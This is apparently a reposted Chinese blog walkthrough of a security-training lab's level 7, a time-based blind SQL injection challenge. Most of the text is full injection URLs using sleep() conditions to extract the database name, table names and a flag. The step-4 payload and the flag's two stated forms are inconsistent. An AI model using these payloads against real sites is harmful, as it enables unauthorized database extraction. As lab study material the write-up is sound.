其他分享
首页 > 其他分享> > 网络信息安全攻防学习平台第7关

网络信息安全攻防学习平台第7关

作者:互联网

1.确定数据库名长度
输入
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(length((SELECT concat(database())))=5,sleep(10),0)--+
猜测数据库长度,当为5等待响应时间很长。
2.猜测数据库名
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select concat(database())),1,1))="109",sleep(10),0)--+
一个一个字符的猜解数据库名的名称,第一个字符为m
经测试,当执行
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select concat(database())),1,5)="mydbs",sleep(10),0)--+
等待响应时间很长,故数据库名称为mydbs
3.猜解表单
第一个 log
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 0,1),1,3)='log',sleep(2),1)--+

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 0,1),1,1))=108,sleep(2),1)--+

第二个 motto
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 1,1),1,5)='motto',sleep(2),1)--+

第三个 user
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select TABLE_NAME from information_schema.tables where table_schema=0x6d79646273 limit 2,1),1,4)='user',sleep(2),1)--+


4.猜解字段
motto表里的motto字段
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select COLUMN_NAME from information_schema.columns where table_name=0x6D6F74746F limit 1,1 ),1,4))='user',sleep(2),1)--+

5.猜解字段内容
执行
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(substr((select motto from motto limit 3,1 ),1,14)="key#notfound!#",sleep(2),1)--+
网站响应时间长,得到字段内容key:notfound!
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and if(ascii(substr((select motto from motto limit 3,1 ),{},1))={},sleep(2),1)--+

6.手注实属麻烦,编写简单的python脚本注。

标签:blind,攻防,b95cf5af3a5fbeca02564bffc63e92e5,信息安全,http,平台,username,lab1,sleep
来源: https://www.cnblogs.com/ersuani/p/12558597.html